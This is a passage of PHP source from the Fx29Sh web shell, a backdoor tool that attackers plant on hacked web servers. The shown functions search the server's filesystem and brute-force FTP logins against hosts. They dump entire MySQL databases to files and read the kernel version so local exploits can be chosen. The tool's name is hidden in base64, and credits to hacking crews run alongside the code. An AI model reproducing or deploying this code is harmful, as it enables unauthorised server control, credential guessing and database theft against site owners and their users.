FUNCTIONS ]## function fx29shexit() { global $gzipencode,$ft; if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) { $v = @ob_get_contents(); @ob_end_clean(); @ob_start("ob_gzHandler"); echo $v; @ob_end_flush(); } exit; } ##[ END OF FX29SH EXIT FUNCTIONS ]## function fx29fsearch($d) { global $found, $found_d, $found_f, $search_i_f, $search_i_d, $a; if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $h = opendir($d); while (($f = readdir($h)) !== FALSE) { if($f != "." && $f != "..") { $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); if (is_dir($d.$f)) { $search_i_d++; if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} if (!is_link($d.$f)) { fx29fsearch($d.$f); } } else { $search_i_f++; if ($bool) { if (!empty($a["text"])) { $r = @file_get_contents($d.$f); if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} else {$bool = strpos(" ".$r,$a["text"],1);} if ($a["text_not"]) {$bool = !$bool;} if ($bool) {$found[] = $d.$f; $found_f++;} } else {$found[] = $d.$f; $found_f++;} } } } } closedir($h); } function tabsort($a,$b) { global $v; return strnatcmp($a[$v], $b[$v]);} function view_perms_color($o) { if (!is_readable($o)) { return "".view_perms(fileperms($o)).""; } elseif (!is_writable($o)) { return "".view_perms(fileperms($o)).""; } else { return "".view_perms(fileperms($o)).""; } } function view_perms($mode) { if (($mode & 0xC000) === 0xC000) {$type = "s";} elseif (($mode & 0x4000) === 0x4000) {$type = "d";} elseif (($mode & 0xA000) === 0xA000) {$type = "l";} elseif (($mode & 0x8000) === 0x8000) {$type = "-";} elseif (($mode & 0x6000) === 0x6000) {$type = "b";} elseif (($mode & 0x2000) === 0x2000) {$type = "c";} elseif (($mode & 0x1000) === 0x1000) {$type = "p";} else {$type = "?";} $owner["read"] = ($mode & 00400)?"r":"-"; $owner["write"] = ($mode & 00200)?"w":"-"; $owner["execute"] = ($mode & 00100)?"x":"-"; $group["read"] = ($mode & 00040)?"r":"-"; $group["write"] = ($mode & 00020)?"w":"-"; $group["execute"] = ($mode & 00010)?"x":"-"; $world["read"] = ($mode & 00004)?"r":"-"; $world["write"] = ($mode & 00002)? "w":"-"; $world["execute"] = ($mode & 00001)?"x":"-"; if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} return $type.join("",$owner).join("",$group).join("",$world); } function parsesort($sort) { $one = intval($sort); $second = substr($sort,-1); if ($second != "d") {$second = "a";} return array($one,$second); } function parse_perms($mode) { if (($mode & 0xC000) === 0xC000) {$t = "s";} elseif (($mode & 0x4000) === 0x4000) {$t = "d";} elseif (($mode & 0xA000) === 0xA000) {$t = "l";} elseif (($mode & 0x8000) === 0x8000) {$t = "-";} elseif (($mode & 0x6000) === 0x6000) {$t = "b";} elseif (($mode & 0x2000) === 0x2000) {$t = "c";} elseif (($mode & 0x1000) === 0x1000) {$t = "p";} else {$t = "?";} $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); } function str2mini($content,$len) { if (strlen($content) > $len) { $len = ceil($len/2) - 2; return substr($content, 0,$len)."...".substr($content,-$len); } else { return $content; } } function strips(&$arr,$k="") { if (is_array($arr)) { foreach($arr as $k=>$v) { if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); } } } else { $arr = stripslashes($arr); } } function getmicrotime() { list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec); } function milw0rm() { $Lversion = php_uname("r"); $OSV = php_uname("s"); if(eregi("Linux",$OSV)) { $Lversion = substr($Lversion,0,6); return " Kernel ".$Lversion; } else { $Lversion = substr($Lversion,0,3); return "".$OSV." ".$Lversion; } } function fx29ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) { if ($fqb_onlywithsh) { $TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin"))); } else { $TRUE = TRUE; } if ($TRUE) { $sock = @ftp_connect($host,$port,$timeout); if (@ftp_login($sock,$login,$pass)) { echo "Connected to ".$host." with login \"".$login."\" and password \"".$pass."\".
"; @ob_flush(); return TRUE; } } } if (!enabled("posix_getpwuid")) { function posix_getpwuid($uid) { return FALSE; } } if (!enabled("posix_getgrgid")) { function posix_getgrgid($gid) { return FALSE; } } if (!enabled("posix_kill")) { function posix_kill($gid) { return FALSE; } } ##[ MySQL FUNCTIONS ]## function mysql_dump($set) { $sock = $set["sock"]; $db = $set["db"]; $print = $set["print"]; $nl2br = $set["nl2br"]; $file = $set["file"]; $add_drop = $set["add_drop"]; $tabs = $set["tabs"]; $onlytabs = $set["onlytabs"]; $ret = array(); $ret["err"] = array(); if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} if (empty($db)) {$db = "db";} if (empty($print)) {$print = 0;} if (empty($nl2br)) {$nl2br = 0;} if (empty($add_drop)) {$add_drop = TRUE;} if (empty($file)) { $file = $tmp_dir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; } if (!is_array($tabs)) {$tabs = array();} if (empty($add_drop)) {$add_drop = TRUE;} if (sizeof($tabs) == 0) { #Retrieve tables-list $res = mysql_query("SHOW TABLES FROM ".$db, $sock); if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} } $out = " # Dumped by ".sh_name()." # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." # Date: ".date("d.m.Y H:i:s")." # DB: \"".$db."\" #---------------------------------------------------------"; $c = count($onlytabs); foreach($tabs as $tab) { if ((in_array($tab,$onlytabs)) or (!$c)) { if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} #Receieve query for create table structure $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); if (!$res) {$ret["err"][] = mysql_smarterror();} else { $row = mysql_fetch_row($res); $out .= $row["1"].";\n\n"; #Receieve table variables $res = mysql_query("SELECT * FROM `$tab`", $sock); if (mysql_num_rows($res) > 0) { while ($row = mysql_fetch_assoc($res)) { $keys = implode("`, `", array_keys($row)); $values = array_values($row); foreach($values as $k=>$v) {$values[$k] = addslashes($v);} $values = implode("', '", $values); $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; $out .= $sql; } } } } } $out .= "#---------------------------------------------------------------------------------\n\n"; if ($file) { $fp = fopen($file, "w"); if (!$fp) {$ret["err"][] = 2;} else { fwrite ($fp, $out); fclose ($fp); } } if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} return $out; } function mysql_buildwhere($array,$sep=" and",$functs=array()) { if (!is_array($array)) {$array = array();} $result = ""; foreach($array as $k=>$v) { $value = ""; if (!empty($functs[$k])) {$value .= $functs[$k]."(";} $value .= "'".addslashes($v)."'"; if (!empty($functs[$k])) {$value .= ")";} $result .= "`".$k."` = ".$value.$sep; } $result = substr($result,0,strlen($result)-strlen($sep)); return $result; } function mysql_fetch_all($query,$sock) { if ($sock) {$result = mysql_query($query,$sock);} else {$result = mysql_query($query);} $array = array(); while ($row = mysql_fetch_array($result)) {$array[] = $row;} mysql_free_result($result); return $array; } function mysql_smarterror($sock) { if ($sock) { $error = mysql_error($sock); } else { $error = mysql_error(); } $error = htmlspecialchars($error); return $error; } function mysql_query_form() { global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
";} if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} if ((!$submit) or ($sql_act)) { echo ""; if ($tbl_struct) { echo "
"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":

"; foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ ".$name."
";} echo "
"; } } if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} } function mysql_create_db($db,$sock="") { $sql = "CREATE DATABASE `".addslashes($db)."`;"; if ($sock) {return mysql_query($sql,$sock);} else {return mysql_query($sql);} } function mysql_query_parse($query) { $query = trim($query); $arr = explode (" ",$query); $types = array( "SELECT"=>array(3,1), "SHOW"=>array(2,1), "DELETE"=>array(1), "DROP"=>array(1) ); $result = array(); $op = strtoupper($arr[0]); if (is_array($types[$op])) { $result["propertions"] = $types[$op]; $result["query"] = $query; if ($types[$op] == 2) { foreach($arr as $k=>$v) { if (strtoupper($v) == "LIMIT") { $result["limit"] = $arr[$k+1]; $result["limit"] = explode(",",$result["limit"]); if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} unset($arr[$k],$arr[$k+1]); } } } } else { return FALSE; } } ##[ END OF MYSQL FUNCTIONS ]## ##[ IMAGES ]## function imagez() { $images = array( "home"=> 'R0lGODlhEwAYALMJAH6+91OZ97zp/l6x/Y/V/iVr7DGQ/QwxyAEKpP///wAAAAAAAAAAAAAAAAAA'. 'AAAAACH5BAHoAwkALAAAAAATABgAAASoMEkJwrwYAyEqyFkQcFwFTuJAkF1xDkExAARdAy4W4EUw'. 'zwAALEfhFQy+5AAWmwwLUIN0OhPlBjLocSpdDgzYBLYnjXa/U1fMQD6auWzxMQBmn0XpBJ6OB6fs'. 'cXwiPl5LBwgIdGqDhV4FiImBKV5CQQGQPjlgS0GVMJBfRD5BBDU1l4g+BxcGNqYEAQeHBasYBqW4'. 'sLK1IAUcK7onFwWlOMIZB0THyxgRADs=', "buffer"=> 'R0lGODlhGAAWALMJABo+qGql77zK4OPw+pXE9Tx33mOCxx5WzYyv4v///wAAAAAAAAAAAAAAAAAA'. 'AAAAACH5BAHoAwkALAAAAAAYABYAAASbMMlJa0LFao0QMZslDMJFEEGhhtPgul4gFwebvK9BICnN'. '4oPOACU7HAAb3Gl4mtGQltfSdSI+AdAWVVlNGbHZmxTYVB3BUOCI2vR+AQaQZL1lz74GhEAgn48I'. 'bCg0BwV7ewh9AgSGgEM9ASOGe32NiwFMAY0ukgZhU1WaOHxhE0tTQCR9GksIqHyqG4qnQbAsAkK0'. 'NhsFiLq+NhEAOw==', "search"=> 'R0lGODlhGAAXAKIEAHl5ecbGxqCgoOvr6////wAAAAAAAAAAACH5BAHoAwQALAAAAAAYABcAAANq'. 'SLq88iK02UIM1kY67fgDhj3c4oGiKJRK9mUpycFpHQClHbw8zl2iEOjlo9SEw1DRuNsliaygMwlY'. 'di7PgcDKUD2moW1utAVAHtUS9maGmLkOTBiudrJZk3Uaz4gQ6XUYe3wNb4CEiImKCQA7', "back"=> 'R0lGODlhGAAYALMJAC9ILkesPbHdo3W0Zi2IJ+f141aOUTRoM4LKdP///wAAAAAAAAAAAAAAAAAA'. 'AAAAACH5BAHoAwkALAAAAAAYABgAAASwMMlJq7046zSM/8YmeYNgFiZiHMdmCEVszoIaXscLpwhC'. 'dy2LASETlAoBXw8xCFYMqNQuWesBK4OjkVgYLL8B52h2LCCS2WxgECAAJiteLNarMtduOEE678/P'. 'bW8jBzVefigybIEUQz0BMF0EAZOTkm6CEgCNbFOUngR5FAdLazCAlKChomt3ASiolpiMB5OKbJZt'. 'oLIVtJ6VuaoXAAepxbq7GcTFAMgbzM/NItLTGxEAOw==', "forward"=> 'R0lGODlhGAAYAKIGAB9fHVu2T7nirIbKdjaXL+z36P///wAAACH5BAHoAwYALAAAAAAYABgAAAOc'. 'aLrc/g1ICSsZIosRSGWXUGjaQAAfIY7Z4GIc+qgFy734+Qxsy2+BV8dBGPVeI04wEJAtfiSgSMCs'. 'Og2AEu5Wo1Z1iuwGsymvChxCxynG1N7wWocAxmaCGVZcQKezYVVfPCNzJ1cBYzdMF4R9dWEwQkFy'. 'hY8KF5KIaI6WYUGKS5ydYReBapxXDgBqpn0UH2Grjq+wDBMTtbm6uwsJADs=', "up"=> 'R0lGODlhGAAXAKIGABxXG0irPrLeo3zFbzWFMOLz3v///wAAACH5BAHoAwYALAAAAAAYABcAAAOP'. 'aLrc/jBKMoa4lRCp6C1XOASbNBQgVq1D6XipsAYs+RCoAFZ5QNMEQIOSq+hQO59PyAjoMEckauQL'. 'MnBQaS5JYnZ2Tx6INu5ed5bRqUClmhcEEU3srlrhIZlsXSe8OxZ6K1NKJAFecIEshFV/CwBONRiN'. 'dy9zFYVKGohDlz92AJw3mSRBohGhqaEcrK2uDgkAOw==', "help"=> 'R0lGODlhGAAYAKIGADlqzKjA6O3x932d3rPk/12Byv///wAAACH5BAHoAwYALAAAAAAYABgAAAOa'. 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"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", "ext_xml"=> "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". "IQA7" ); return $images; } function sh_name() { return base64_decode("RmFUYUxpc1RpQ3pfRnggRngyOVNoZUxMIHY=").sh_ver; } function fx29sh_tools() { echo "
.: TooLz :.
"; } function fx29sh_about() { echo "
.: Credits :.
". "Idea, leader & coder: tristram [CCTeaM]
". "Beta-tester & tips: NukLeoN [AnTiSh@Re tEaM]
". "Re-coder, Designer, Windows Fix, PHP Mailer & PHP Filesystem: kaMtiEz [KiLL-9 Crew]
". "
". "Please report bugs to FaTaLisTiCz_Fx\n"; } function html_style() { $style = ' '.getenv("HTTP_HOST").' - '.sh_name().'
'; return $style; }; function html_header() { return "".sh_name()."
.: a little piece of heaven :."; } function html_footer() { return "© 2008 By kaMtiEz, KiLL-9 CreW. Generated: ".round(getmicrotime()-starttime,4)." seconds"; } function disp_error($msg) { echo "
\n"; } function srv_info($title,$contents) { echo "\t\t\t$title:$contents\n"; } function srv_software($surl) { $srv_software = getenv("SERVER_SOFTWARE"); if (!ereg("PHP/".phpversion(),$srv_software)) { $srv_software .= ". PHP/".phpversion(); } return str_replace("PHP/".phpversion(),"PHP/".phpversion()."",htmlspecialchars($srv_software)); } ######################## ##[ END OF FUNCTIONS ]## ######################## chdir($lastdir); fx29shexit(); ########################## ##[ FeeLCoMz Community ]## ########################## ?>